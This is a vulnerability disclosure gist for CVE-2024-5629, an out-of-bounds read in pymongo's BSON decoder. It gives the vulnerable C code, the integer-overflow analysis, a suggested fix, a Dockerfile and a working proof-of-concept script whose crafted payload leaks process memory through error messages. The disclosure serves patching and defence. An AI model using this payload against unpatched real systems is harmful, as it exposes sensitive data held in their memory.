@keltecc
Last active June 21, 2024 10:26
[pymongo] out-of-bounds read PoC (CVE-2024-5629)

Assigned CVE: CVE-2024-5629

Snyk advisory: SNYK-PYTHON-PYMONGO-7172112

GitHub advisory: GHSA-m87m-mmvp-v9qm

GitHub commit: PYTHON-4305 Fix bson size check (#1564)

Package details

Package manager: pip

Affected module: pymongo

GitHub repo: mongodb/mongo-python-driver

Module description:

The PyMongo distribution contains tools for interacting with MongoDB database from Python. The bson package is an implementation of the BSON format for Python. The pymongo package is a native Python driver for MongoDB. The gridfs package is a gridfs implementation on top of pymongo.

Vulnerability description

Out-of-bounds read in bson module. Possible risk: leak of sensitive data.

Vulnerability: an integer overflow in BSON deserialization. With a crafted payload, an attacker can force the parser to deserialize memory that lies outside the input buffer. The parser interprets the bytes that follow the buffer and raises an exception whose message contains them as a string. If those bytes are not valid UTF-8, the exception message reveals a single byte instead.

How to reproduce

I've tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.

There is a simple PoC in file poc.py. The PoC contains two cases:

  1. leak of a previously used variable; an arbitrary string in memory could be leaked the same way
  2. leak of 5 individual non-printable bytes

You can use the provided Dockerfile to reproduce the environment.

  1. Build the image
docker build --tag pymongo-poc .
  2. Run the image
docker run --rm pymongo-poc
  3. Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?

## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte

Please note that XXXXXXXXXXXXXX is a part of the secret variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff] could be consecutive bytes from process memory.
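
To make the second case concrete, here is a minimal sketch of how the leaked byte values could be collected from the exception messages. The helper name `leaked_bytes` is hypothetical and not part of the PoC; it only assumes the message format shown in the output above.

```python
import re

# Hypothetical helper (not part of the PoC): pull the byte value out of
# each "can't decode byte 0x.." message printed in case 2.
_BYTE_RE = re.compile(r"can't decode byte 0x([0-9a-f]{2})")


def leaked_bytes(messages):
    """Return the byte values reported by the decode errors, in order."""
    values = []
    for message in messages:
        match = _BYTE_RE.search(message)
        if match:
            values.append(int(match.group(1), 16))
    return bytes(values)


# Messages copied from the expected output above.
messages = [
    "'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte",
    "'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte",
    "'utf-8' codec can't decode byte 0xff in position 0: invalid start byte",
]

print(leaked_bytes(messages).hex())  # 90fc98f7ff
```

Note that the first message reports position 1, so one byte before it decoded successfully and is not shown; the collected values are therefore not guaranteed to be strictly adjacent in memory.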

Vulnerability details

The source code of the tested version (4.6.2) is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2

The vulnerability is located in file bson/_cbsonmodule.c. The interesting part is deserialization of type 15 (JavaScript code with scope):

    case 15:
        {
            uint32_t c_w_s_size;
            uint32_t code_size;
            uint32_t scope_size;
            PyObject* code;
            PyObject* scope;
            PyObject* code_type;

            if (max < 8) {
                goto invalid;
            }

            memcpy(&c_w_s_size, buffer + *position, 4);
            c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
            *position += 4;

            if (max < c_w_s_size) {
                goto invalid;
            }

            memcpy(&code_size, buffer + *position, 4);
            code_size = BSON_UINT32_FROM_LE(code_size);
            /* code_w_scope length + code length + code + scope length */
            if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
                goto invalid;
            }
            *position += 4;
            /* Strings must end in \0 */
            if (buffer[*position + code_size - 1]) {
                goto invalid;
            }
            code = PyUnicode_DecodeUTF8(
                buffer + *position, code_size - 1,
                options->unicode_decode_error_handler);
            if (!code) {
                goto invalid;
            }
            *position += code_size;

            memcpy(&scope_size, buffer + *position, 4);
            scope_size = BSON_UINT32_FROM_LE(scope_size);
            if (scope_size < BSON_MIN_SIZE) {
                Py_DECREF(code);
                goto invalid;
            }
            /* code length + code + scope length + scope */
            if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
                Py_DECREF(code);
                goto invalid;
            }

            /* Check for bad eoo */
            if (buffer[*position + scope_size - 1]) {
                goto invalid;
            }
            scope = elements_to_dict(self, buffer + *position + 4,
                                     scope_size - 5, options);
            if (!scope) {
                Py_DECREF(code);
                goto invalid;
            }
            *position += scope_size;

            if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
                value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
                Py_DECREF(code_type);
            }
            Py_DECREF(code);
            Py_DECREF(scope);
            break;
        }

The "code with scope" type contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of the variables the code closes over. The parsing code is straightforward, so I won't describe it in detail.

The vulnerable part is here:

            /* code length + code + scope length + scope */
            if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
                Py_DECREF(code);
                goto invalid;
            }

Note that code_size, scope_size, and c_w_s_size are all controlled by the attacker, since they are read from the input buffer as 4-byte integers. Because all of them are uint32_t, the sum on the left-hand side of the check can overflow. We can set scope_size to a "negative" value (which, as an unsigned integer, is a very large value) and still pass the check by choosing matching code_size and c_w_s_size values.
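
The wraparound can be checked by hand with the values used in the PoC payload. The sketch below models uint32_t arithmetic in Python by masking to 32 bits; the helper `u32` is an illustration only and is not taken from the driver.

```python
UINT32_MASK = 0xFFFFFFFF


def u32(value: int) -> int:
    """Model C uint32_t arithmetic: keep only the low 32 bits."""
    return value & UINT32_MASK


# Values taken from the PoC payload.
code_size = 0x00000004
scope_size = 0xFFFFFFFE  # "-2" when read as a signed 32-bit integer
c_w_s_size = 0x0000000A

exact_sum = 4 + code_size + 4 + scope_size
wrapped_sum = u32(exact_sum)

print(hex(exact_sum))             # 0x10000000a
print(hex(wrapped_sum))           # 0xa
print(wrapped_sum == c_w_s_size)  # True, so the size check passes
```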

scope_size is then passed to the elements_to_dict() function (as scope_size - 5). If the value is large enough, the function deserializes memory beyond the end of the buffer. That memory is interpreted as a BSON element with a "type" byte and a "fieldname" string. If the "type" is an invalid value (for example \x00), bson raises an exception whose message contains the "fieldname" string.
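
The effect can be illustrated with a toy model in pure Python. This is not the driver's code: `read_element_header` is a hypothetical stand-in for the first step of element parsing, and the `memory` bytes are an invented picture of the end of the buffer followed by unrelated process data.

```python
def read_element_header(memory: bytes, offset: int):
    """Read one type byte, then a NUL-terminated field name (toy model)."""
    element_type = memory[offset:offset + 1]
    name_end = memory.index(b"\x00", offset + 1)
    name = memory[offset + 1:name_end].decode("utf-8")
    return element_type, name


# Invented memory image: the tail of the attacker's buffer, followed by
# data that does not belong to it (here, a stand-in for the secret).
payload_tail = b"\x00\x00\x00\x00"
adjacent = b"XXXXXXXXXXXXXX\x00more"
memory = payload_tail + adjacent

# The parser believes the document continues, so it reads the last zero
# byte as a type and everything up to the next NUL as the field name.
element_type, name = read_element_header(memory, len(payload_tail) - 1)
print(f"Detected unknown BSON type {element_type!r} for fieldname {name!r}.")
```

In the real driver the field name ends up in the error message in the same way, which is what turns the out-of-bounds read into an information leak.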

An example trigger (from the PoC file):

bytes.fromhex(
    struct.pack('<I', length).hex() + # payload size
    '0f' + # type "code with scope"
    '3100' + # key (cstring)
    '0a000000' + # c_w_s_size
    '04000000' + # code_size
    '41004200' + # code (cstring)
    'feffffff' + # scope_size
    '02' + # type "string"
    '3200' + # key (cstring)
    struct.pack('<I', string_size).hex() + # string size
    '00' * string_size # value (cstring)
    # next bytes is a field name for type \x00
    # type \x00 is invalid so bson throws an exception
)

The last '00' byte is interpreted as type \x00, and the bytes that follow it (located after the managed buffer) are interpreted as the fieldname. Since type \x00 is invalid, the exception message includes the fieldname.
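
As a sanity check on the layout, the fixed-size fields of the payload can be read back with `struct.unpack_from`. In the sketch below `generate_payload` is copied from the PoC, while `describe` and its offsets are an illustration derived from the byte layout above.

```python
import struct


def generate_payload(length: int) -> bytes:
    # Copied from the PoC.
    string_size = length - 0x1e
    return bytes.fromhex(
        struct.pack('<I', length).hex() +  # payload size
        '0f' +                             # type "code with scope"
        '3100' +                           # key (cstring)
        '0a000000' +                       # c_w_s_size
        '04000000' +                       # code_size
        '41004200' +                       # code (cstring)
        'feffffff' +                       # scope_size
        '02' +                             # type "string"
        '3200' +                           # key (cstring)
        struct.pack('<I', string_size).hex() +  # string size
        '00' * string_size                 # value (cstring)
    )


def describe(payload: bytes) -> dict:
    """Decode the little-endian size fields at their fixed offsets."""
    (length,) = struct.unpack_from('<I', payload, 0)
    c_w_s_size, code_size = struct.unpack_from('<II', payload, 7)
    (scope_size,) = struct.unpack_from('<I', payload, 19)
    (string_size,) = struct.unpack_from('<I', payload, 26)
    return {
        'length': length,
        'c_w_s_size': c_w_s_size,
        'code_size': code_size,
        'scope_size': scope_size,
        'string_size': string_size,
    }


payload = generate_payload(0x50)
for field, value in describe(payload).items():
    print(f'{field:12} {value:#010x}')
```

The 0x1e subtracted in `generate_payload` is the 30 bytes of header in front of the zero-filled string, so the declared length matches the actual size of the payload.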

Suggested fix

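The total size, c_w_s_size, is checked against max directly:

if (max < c_w_s_size) {
    goto invalid;
}

I suggest adding the same check for the code_size and scope_size variables. In the listing above code_size is already compared with max, but scope_size never is. With every size bounded by max, the crafted values from the PoC are rejected before the sum can wrap around.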
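
The suggestion can be modelled in Python to see its effect on the PoC values. This is a sketch of the idea only, not the patch that was merged upstream: the function names are hypothetical, `BSON_MIN_SIZE = 5` is an assumption about the driver's constant, and the `max_size` of 0x50 is an arbitrary example.

```python
BSON_MIN_SIZE = 5  # assumed value of the driver's constant


def u32(value: int) -> int:
    """Model C uint32_t arithmetic."""
    return value & 0xFFFFFFFF


def original_checks(max_size, c_w_s_size, code_size, scope_size) -> bool:
    """Mirror the size checks from the listing above."""
    if max_size < c_w_s_size:
        return False
    if (not code_size or max_size < code_size
            or max_size < u32(4 + 4 + code_size + 4)):
        return False
    if scope_size < BSON_MIN_SIZE:
        return False
    return u32(4 + code_size + 4 + scope_size) == c_w_s_size


def suggested_checks(max_size, c_w_s_size, code_size, scope_size) -> bool:
    """Same checks, plus the suggested bound on scope_size."""
    if max_size < scope_size:
        return False
    return original_checks(max_size, c_w_s_size, code_size, scope_size)


# Crafted values from the PoC: accepted before, rejected after.
print(original_checks(0x50, 0x0A, 0x04, 0xFFFFFFFE))   # True
print(suggested_checks(0x50, 0x0A, 0x04, 0xFFFFFFFE))  # False

# A well-formed element (4 + 4 + 4 + 5 = 17) passes both.
print(original_checks(0x50, 17, 4, 5))   # True
print(suggested_checks(0x50, 17, 4, 5))  # True
```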

How it was found

Deserialization is usually non-trivial and difficult to implement without bugs. I read the entire bson code carefully, paying particular attention to the use of integer variables, and found this by chance.

Dockerfile

FROM python:3.12@sha256:e83d1f4d0c735c7a54fc9dae3cca8c58473e3b3de08fcb7ba3d342ee75cfc09d
RUN pip install pymongo==4.6.2
COPY poc.py /tmp/poc.py
ENTRYPOINT python3 -u /tmp/poc.py

poc.py

import bson
import struct


def function(length: int) -> bytes:
    secret = b'X' * length
    # do some stuff with secret
    # ...
    # variable 'secret' is deleted here
    # but it's still stored in memory


def generate_payload(length: int) -> bytes:
    string_size = length - 0x1e
    return bytes.fromhex(
        struct.pack('<I', length).hex() + # payload size
        '0f' + # type "code with scope"
        '3100' + # key (cstring)
        '0a000000' + # c_w_s_size
        '04000000' + # code_size
        '41004200' + # code (cstring)
        'feffffff' + # scope_size
        '02' + # type "string"
        '3200' + # key (cstring)
        struct.pack('<I', string_size).hex() + # string size
        '00' * string_size # value (cstring)
        # next bytes is a field name for type \x00
        # type \x00 is invalid so bson throws an exception
    )


def deserialize_payload(payload: bytes) -> None:
    try:
        obj = bson.decode(payload) # throws exception
        print(obj) # unreachable code
    except Exception as e:
        print(e)


print('## case 1: leak the printable string ##')

# uses secret internally
function(0x50 + 0x0F)

# payload could be read from stdin or similar
payload = generate_payload(0x50)
deserialize_payload(payload)

###

print('\n## case 2: leak some non-printable bytes ##')

for i in range(5):
    # payload could be read from stdin or similar
    payload = generate_payload(0x54f + i)
    deserialize_payload(payload)